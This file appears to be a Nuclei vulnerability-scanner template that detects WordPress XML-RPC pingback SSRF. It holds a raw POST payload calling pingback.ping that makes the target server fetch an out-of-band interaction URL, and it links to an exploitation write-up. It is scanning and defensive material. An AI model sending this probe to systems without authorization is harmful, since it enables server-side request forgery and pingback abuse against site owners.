nuclei-templates/http/vulnerabilities/wordpress/wp-xmlrpc-pingback-detectio...

43 lines
1.1 KiB
YAML

id: wp-xmlrpc-pingback-detection
info:
name: Wordpress XMLRPC Pingback detection
author: pdteam
severity: info
reference:
- https://github.com/dorkerdevil/rpckiller
- https://the-bilal-rizwan.medium.com/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32
metadata:
max-request: 1
tags: wordpress,ssrf,oast,xmlrpc
http:
- raw:
- |
POST /xmlrpc.php HTTP/1.1
Host: {{Hostname}}
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value>
<string>http://{{interactsh-url}}</string>
</value>
</param>
<param>
<value>
<string>{{BaseURL}}/?p=1</string>
</value>
</param>
</params>
</methodCall>
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
# digest: 4b0a004830460221008b8847819052a4cc6cd580593aa61fc11d40f73fa22d07b122b1a20410cfc54c022100ff2ea66548804bac51edcc23bfe7259dd34f27a13a7eef2890239b93dcdeb8cf:922c64590222798bb761d5b6d8e72950